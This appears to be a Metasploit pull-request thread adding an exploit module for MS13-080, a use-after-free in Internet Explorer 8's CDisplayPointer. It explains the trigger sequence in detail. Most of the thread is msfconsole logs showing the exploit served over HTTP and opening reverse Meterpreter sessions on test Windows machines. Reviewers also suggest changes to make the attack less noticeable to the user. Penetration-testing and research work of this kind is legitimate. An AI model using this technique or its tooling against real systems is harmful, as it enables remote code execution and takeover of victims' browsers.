Add MS13-080 (CVE-2013-3897): Internet Explorer CDisplayPointer Use-After-Free

[wchen-r7]

This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893,
except this was kept out of the public eye by multiple research companies and the vendor until the October patch release.

This issue is a use-after-free vulnerability in CDisplayPointer via the use of a "onpropertychange" event handler. To setup the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called "onselect". The "onselect" event will allow us to setup for the actual event handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger "onpropertychange". During "onpropertychange" event handling, a free of the CDisplayPointer object can be forced by using an "Unslect" (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call,
because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.

The module has been tested against the following setups:

• IE 8 + Win 7 + Office 2007
• IE 8 + Win 7 + Office 2010
• IE 8 + Win 7 + JRE6
• IE 8 + Win XP

Demo for setup 1 (IE8 + Win 7 + Office 2007):

$ msfconsole -q
msf > use exploit/windows/browser/ms13_080_cdisplaypointer 
msf exploit(ms13_080_cdisplaypointer) > run
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/iUz9VHP
[*]  Local IP: http://10.0.1.76:8080/iUz9VHP
[*] Server started.
msf exploit(ms13_080_cdisplaypointer) >
[*] 10.0.1.9         ms13_080_cdisplaypointer - Checking out target...
[*] 10.0.1.9         ms13_080_cdisplaypointer - Target uses Microsoft Windows 7 MSIE 8.0 with office2007 DLL... engaging.
[*] Sending stage (770048 bytes) to 10.0.1.9
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.9:49347) at 2013-10-12 13:07:30 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.9:49347) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2284)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2488
[+] Successfully migrated to process 

Demo for setup 2 (IE 8 + Win 7 + Office 2010):

$ msfconsole -q
msf > use exploit/windows/browser/ms13_080_cdisplaypointer 
msf exploit(ms13_080_cdisplaypointer) > run
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/quUXPn5IL93M2
[*]  Local IP: http://10.0.1.76:8080/quUXPn5IL93M2
[*] Server started.
msf exploit(ms13_080_cdisplaypointer) >
[*] 10.0.1.6         ms13_080_cdisplaypointer - Checking out target...
[*] 10.0.1.6         ms13_080_cdisplaypointer - Target uses Microsoft Windows 7 MSIE 8.0 with office2010 DLL... engaging.
[*] Sending stage (770048 bytes) to 10.0.1.6
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.6:49413) at 2013-10-12 13:11:17 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.6:49413) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2172)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1780
[+] Successfully migrated to process 

Demo for setup 3 (IE 8 + Win 7 + JRE6):

$ msfconsole -q
msf > use exploit/windows/browser/ms13_080_cdisplaypointer 
msf exploit(ms13_080_cdisplaypointer) > run
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/y8nZkCMlypRYfEg
[*]  Local IP: http://10.0.1.76:8080/y8nZkCMlypRYfEg
[*] Server started.
msf exploit(ms13_080_cdisplaypointer) >
[*] 10.0.1.9         ms13_080_cdisplaypointer - Checking out target...
[*] 10.0.1.9         ms13_080_cdisplaypointer - Target uses Microsoft Windows 7 MSIE 8.0 with default DLL... engaging.
[*] Sending stage (770048 bytes) to 10.0.1.9
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.9:49160) at 2013-10-12 13:18:51 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.9:49160) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (516)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2612
[+] Successfully migrated to process

Demo for setup 4 (IE8 + XP):

$ msfconsole -q
msf > use exploit/windows/browser/ms13_080_cdisplaypointer 
msf exploit(ms13_080_cdisplaypointer) > run
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/zi5zhThzD19o8qH
[*]  Local IP: http://10.0.1.76:8080/zi5zhThzD19o8qH
[*] Server started.
msf exploit(ms13_080_cdisplaypointer) > [*] 10.0.1.76        ms13_080_cdisplaypointer - Checking out target...
[*] 10.0.1.76        ms13_080_cdisplaypointer - Target uses Microsoft Windows XP MSIE 8.0 with default DLL... engaging.
[*] Sending stage (770048 bytes) to 10.0.1.76
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.76:59265) at 2013-10-12 13:20:23 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.76:59265) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2708)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 608
[+] Successfully migrated to process

[Meatballs1]

This could be part of a mixin as presumably this javascript would be used for all exploits using hxds?

[wchen-r7]

Yeah, it will be. I recently obtained multiple versions of Office so I'll be looking into that. Ticket:
http://dev.metasploit.com/redmine/issues/8413

[Meatballs1]

Works IE 8 Win7 JRE.

Will check XP but only have Office 2k13...

[wchen-r7]

Thanks for testing. If you're on XP, then it will only use the msvcrt ROP.

[Meatballs1]

I was referring to the Win7 targets using Office

[wchen-r7]

Ah ok. Well no worries there, can let Juan test the rest :-)

[Meatballs1]

Defaults (JRE/MSVCRT) works fine for Win7/WinXP.

N.B. Not always reliable if you try and run it again on an already exploited box (even restarting IE), crashes the tab, but generally works when the tab auto-restarts

[*] 192.168.1.13     ms13_080_cdisplaypointer - Checking out target...
[*] 192.168.1.13     ms13_080_cdisplaypointer - Target uses Microsoft Windows XP MSIE 8.0 with default DLL... engaging.
[*] Sending stage (770048 bytes) to 192.168.1.13
[*] Meterpreter session 2 opened (192.168.1.121:4444 -> 192.168.1.13:1061) at 2013-10-12 21:43:58 +0100
[*] Session ID 2 (192.168.1.121:4444 -> 192.168.1.13:1061) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2192)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2700
[+] Successfully migrated to process 
msf exploit(ms13_080_cdisplaypointer) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : XPPROSP2
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_GB
Meterpreter     : x86/win32

[*] 192.168.1.14     ms13_080_cdisplaypointer - Checking out target...
[*] 192.168.1.14     ms13_080_cdisplaypointer - Target uses Microsoft Windows 7 MSIE 8.0 with default DLL... engaging.
[*] Sending stage (770048 bytes) to 192.168.1.14
[*] Meterpreter session 6 opened (192.168.1.121:4444 -> 192.168.1.14:49321) at 2013-10-12 21:48:13 +0100
[*] Session ID 6 (192.168.1.121:4444 -> 192.168.1.14:49321) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1664)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2968
[+] Successfully migrated to process 
sessions -i 6
[*] Starting interaction with 6...

meterpreter > sysinfo
Computer        : IE8WIN7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

[Meatballs1]

Should really use XMLHttpRequest to POST the data back, or at least encode the data so its not quite so obvious to the user ;)

[wchen-r7]

Tried, actually. Made the exploit less stable, not sure why.

[Meatballs1]

Then perhaps just encode the query params or assign a random strings to identify the dlls/os's in the framework/javascript?

[wchen-r7]

I'll do random strings, thanks for the suggestion. Doesn't look like we offer any javascript code for encoding or hashing in Metasploit :-/

[wchen-r7]

How's your WinDBG-fu? If you can capture one of the failed attempts, .dump the crash and e-mail to me, perhaps I can figure out why.

[jvazquez-r7]

I think dll isn't used in this function, is it? can be deleted?

[jvazquez-r7]

• Tested successfully on WIN7 / IE8 / Office 2010:

msf > use exploit/windows/browser/ms13_080_cdisplaypointer 
msf exploit(ms13_080_cdisplaypointer) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/7HD3h2ySY81d
[*]  Local IP: http://192.168.0.3:8080/7HD3h2ySY81d
[*] Server started.
msf exploit(ms13_080_cdisplaypointer) > [*] 192.168.0.3      ms13_080_cdisplaypointer - Checking out target...
[*] 192.168.0.3      ms13_080_cdisplaypointer - Target uses Microsoft Windows 7 MSIE 8.0 with Office 2010 DLL
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:62668) at 2013-10-12 17:12:50 -0500
[*] Session ID 1 (192.168.0.3:4444 -> 192.168.0.3:62668) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3464)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3864
[+] Successfully migrated to process 

msf exploit(ms13_080_cdisplaypointer) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
sServer username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

Just giving some time in case @Meatballs1 / @wchen-r7 would like to handle the issues experienced by @Meatballs1

[Meatballs1]

I have sent a crash dump to @wchen-r7 rapid7 address but it seemed reliable first exploitation so probably good to land.

When I got debugging tools installed it got really reliable when I was trying to get a crash dump..!

[wchen-r7]

Juan - so I looked at the crash dump. As far as I could tell, the crash was properly controlled and redirected to the target address. The payload at the target address was fully decoded. Hard to tell what happens after that, because the dump doesn't show me a crash (it's at ntdll!DbgBreakPoint). I can only assume the payload failed for some reason in that particular case, I don't know why. We know typically this is either:

• Due to a bad heap handle. I could use PrependMigrate to HOPEFULLY overcome this if this is the case.
• That corruption during post-exploitation that's been forcing us to add rand_text_alpha(12000) at the end of the payload.

One way I know to determine which one is we kinda need to know whether Ben hit the failure before or after seeing the "Sending stage..." message in msfconsole. If he saw the message, that probably means the second. If not, I guess it's the first.

[jvazquez-r7]

Okey, in this case, just testing the office 2007 case and landing!!

[jvazquez-r7]

Office 2007 rop case also working:

msf > use exploit/windows/browser/ms13_080_cdisplaypointer 
msf exploit(ms13_080_cdisplaypointer) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/sj8PFRkMH9WABa
[*]  Local IP: http://192.168.0.3:8080/sj8PFRkMH9WABa
[*] Server started.
msf exploit(ms13_080_cdisplaypointer) > [*] 192.168.0.3      ms13_080_cdisplaypointer - Checking out target...
[*] 192.168.0.3      ms13_080_cdisplaypointer - Target uses Microsoft Windows 7 MSIE 8.0 with Office 2007 DLL
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:51593) at 2013-10-12 20:04:36 -0500
[*] Session ID 1 (192.168.0.3:4444 -> 192.168.0.3:51593) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2196)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1696

msf exploit(ms13_080_cdisplaypointer) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > [+] Successfully migrated to process 
sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

landing!

[wchen-r7]

Thanks for testing, guys.